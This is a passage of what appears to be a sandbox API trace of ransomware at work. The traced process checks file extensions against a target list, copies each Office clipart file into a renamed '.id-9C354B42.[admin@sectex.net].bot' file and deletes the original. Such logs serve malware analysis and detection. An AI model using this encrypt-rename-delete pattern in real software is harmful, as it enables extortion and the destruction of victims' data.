	[0059.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.219] lstrlenW (lpString=".doc") returned 4
	[0059.219] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.220] lstrlenW (lpString=".docx") returned 5
	[0059.220] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.220] lstrlenW (lpString=".pdf") returned 4
	[0059.220] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.220] lstrlenW (lpString=".xls") returned 4
	[0059.220] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.220] lstrlenW (lpString=".xlsx") returned 5
	[0059.220] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.220] lstrlenW (lpString=".ppt") returned 4
	[0059.220] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.220] lstrlenW (lpString=".zip") returned 4
	[0059.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.220] lstrlenW (lpString=".rar") returned 4
	[0059.220] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.220] lstrlenW (lpString=".bz2") returned 4
	[0059.220] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.220] lstrlenW (lpString=".7z") returned 3
	[0059.220] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.220] lstrlenW (lpString=".dbf") returned 4
	[0059.220] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.220] lstrlenW (lpString=".1cd") returned 4
	[0059.220] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63
	[0059.220] lstrlenW (lpString=".jpg") returned 4
	[0059.220] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.220] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.220] lstrlenW (lpString="AN04117_.WMF") returned 12
	[0059.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.221] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=6060) returned 1
	[0059.221] CloseHandle (hObject=0x15c) returned 1
	[0059.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf")) returned 0x20
	[0059.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.221] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.221] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160
	[0059.221] GetLastError () returned 0x0
	[0059.221] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x17ac, lpOverlapped=0x0) returned 1
	[0059.223] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x17b0, lpOverlapped=0x0) returned 1
	[0059.225] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.225] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.225] SetEndOfFile (hFile=0x160) returned 1
	[0059.225] CloseHandle (hObject=0x160) returned 1
	[0059.225] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.225] SetEndOfFile (hFile=0x15c) returned 1
	[0059.226] CloseHandle (hObject=0x15c) returned 1
	[0059.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.226] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf")) returned 1
	[0059.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.226] lstrlenW (lpString=".doc") returned 4
	[0059.226] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.226] lstrlenW (lpString=".docx") returned 5
	[0059.226] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.226] lstrlenW (lpString=".pdf") returned 4
	[0059.226] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.226] lstrlenW (lpString=".xls") returned 4
	[0059.227] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.227] lstrlenW (lpString=".xlsx") returned 5
	[0059.227] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.227] lstrlenW (lpString=".ppt") returned 4
	[0059.227] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.227] lstrlenW (lpString=".zip") returned 4
	[0059.227] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.227] lstrlenW (lpString=".rar") returned 4
	[0059.227] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.227] lstrlenW (lpString=".bz2") returned 4
	[0059.227] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.227] lstrlenW (lpString=".7z") returned 3
	[0059.227] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.227] lstrlenW (lpString=".dbf") returned 4
	[0059.227] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.227] lstrlenW (lpString=".1cd") returned 4
	[0059.227] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.227] lstrlenW (lpString=".jpg") returned 4
	[0059.227] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.227] lstrlenW (lpString=".doc") returned 4
	[0059.227] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.227] lstrlenW (lpString=".docx") returned 5
	[0059.227] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.227] lstrlenW (lpString=".pdf") returned 4
	[0059.227] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.227] lstrlenW (lpString=".xls") returned 4
	[0059.227] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.227] lstrlenW (lpString=".xlsx") returned 5
	[0059.227] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.227] lstrlenW (lpString=".ppt") returned 4
	[0059.228] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.228] lstrlenW (lpString=".zip") returned 4
	[0059.228] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.228] lstrlenW (lpString=".rar") returned 4
	[0059.228] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.228] lstrlenW (lpString=".bz2") returned 4
	[0059.228] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.228] lstrlenW (lpString=".7z") returned 3
	[0059.228] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.228] lstrlenW (lpString=".dbf") returned 4
	[0059.228] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.228] lstrlenW (lpString=".1cd") returned 4
	[0059.228] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63
	[0059.228] lstrlenW (lpString=".jpg") returned 4
	[0059.228] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.228] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.228] lstrlenW (lpString="AN04134_.WMF") returned 12
	[0059.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.228] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=3416) returned 1
	[0059.228] CloseHandle (hObject=0x15c) returned 1
	[0059.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf")) returned 0x20
	[0059.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.229] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.229] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160
	[0059.229] GetLastError () returned 0x0
	[0059.229] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0xd58, lpOverlapped=0x0) returned 1
	[0059.232] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xd60, lpOverlapped=0x0) returned 1
	[0059.233] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.233] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.233] SetEndOfFile (hFile=0x160) returned 1
	[0059.233] CloseHandle (hObject=0x160) returned 1
	[0059.234] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.234] SetEndOfFile (hFile=0x15c) returned 1
	[0059.234] CloseHandle (hObject=0x15c) returned 1
	[0059.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.235] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf")) returned 1
	[0059.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.235] lstrlenW (lpString=".doc") returned 4
	[0059.235] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.235] lstrlenW (lpString=".docx") returned 5
	[0059.235] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.235] lstrlenW (lpString=".pdf") returned 4
	[0059.235] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.235] lstrlenW (lpString=".xls") returned 4
	[0059.235] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.235] lstrlenW (lpString=".xlsx") returned 5
	[0059.235] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.235] lstrlenW (lpString=".ppt") returned 4
	[0059.235] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.235] lstrlenW (lpString=".zip") returned 4
	[0059.235] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.235] lstrlenW (lpString=".rar") returned 4
	[0059.235] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.235] lstrlenW (lpString=".bz2") returned 4
	[0059.235] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.235] lstrlenW (lpString=".7z") returned 3
	[0059.235] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.235] lstrlenW (lpString=".dbf") returned 4
	[0059.235] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.236] lstrlenW (lpString=".1cd") returned 4
	[0059.236] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.236] lstrlenW (lpString=".jpg") returned 4
	[0059.236] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.236] lstrlenW (lpString=".doc") returned 4
	[0059.236] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.236] lstrlenW (lpString=".docx") returned 5
	[0059.236] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.236] lstrlenW (lpString=".pdf") returned 4
	[0059.236] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.236] lstrlenW (lpString=".xls") returned 4
	[0059.236] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.236] lstrlenW (lpString=".xlsx") returned 5
	[0059.236] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.236] lstrlenW (lpString=".ppt") returned 4
	[0059.236] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.236] lstrlenW (lpString=".zip") returned 4
	[0059.236] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.236] lstrlenW (lpString=".rar") returned 4
	[0059.236] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.236] lstrlenW (lpString=".bz2") returned 4
	[0059.236] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.236] lstrlenW (lpString=".7z") returned 3
	[0059.236] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.236] lstrlenW (lpString=".dbf") returned 4
	[0059.236] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.236] lstrlenW (lpString=".1cd") returned 4
	[0059.237] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63
	[0059.237] lstrlenW (lpString=".jpg") returned 4
	[0059.237] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.237] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.237] lstrlenW (lpString="AN04174_.WMF") returned 12
	[0059.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.238] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=2636) returned 1
	[0059.238] CloseHandle (hObject=0x15c) returned 1
	[0059.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf")) returned 0x20
	[0059.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.238] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.238] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160
	[0059.238] GetLastError () returned 0x0
	[0059.238] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0xa4c, lpOverlapped=0x0) returned 1
	[0059.240] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xa50, lpOverlapped=0x0) returned 1
	[0059.241] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.241] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.241] SetEndOfFile (hFile=0x160) returned 1
	[0059.241] CloseHandle (hObject=0x160) returned 1
	[0059.241] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.241] SetEndOfFile (hFile=0x15c) returned 1
	[0059.242] CloseHandle (hObject=0x15c) returned 1
	[0059.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.242] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf")) returned 1
	[0059.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.243] lstrlenW (lpString=".doc") returned 4
	[0059.243] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.243] lstrlenW (lpString=".docx") returned 5
	[0059.243] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.243] lstrlenW (lpString=".pdf") returned 4
	[0059.243] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.243] lstrlenW (lpString=".xls") returned 4
	[0059.243] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.243] lstrlenW (lpString=".xlsx") returned 5
	[0059.243] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.243] lstrlenW (lpString=".ppt") returned 4
	[0059.243] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.243] lstrlenW (lpString=".zip") returned 4
	[0059.243] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.243] lstrlenW (lpString=".rar") returned 4
	[0059.243] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.243] lstrlenW (lpString=".bz2") returned 4
	[0059.243] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.243] lstrlenW (lpString=".7z") returned 3
	[0059.243] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.243] lstrlenW (lpString=".dbf") returned 4
	[0059.243] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.243] lstrlenW (lpString=".1cd") returned 4
	[0059.243] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.243] lstrlenW (lpString=".jpg") returned 4
	[0059.243] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.243] lstrlenW (lpString=".doc") returned 4
	[0059.243] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.243] lstrlenW (lpString=".docx") returned 5
	[0059.244] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.244] lstrlenW (lpString=".pdf") returned 4
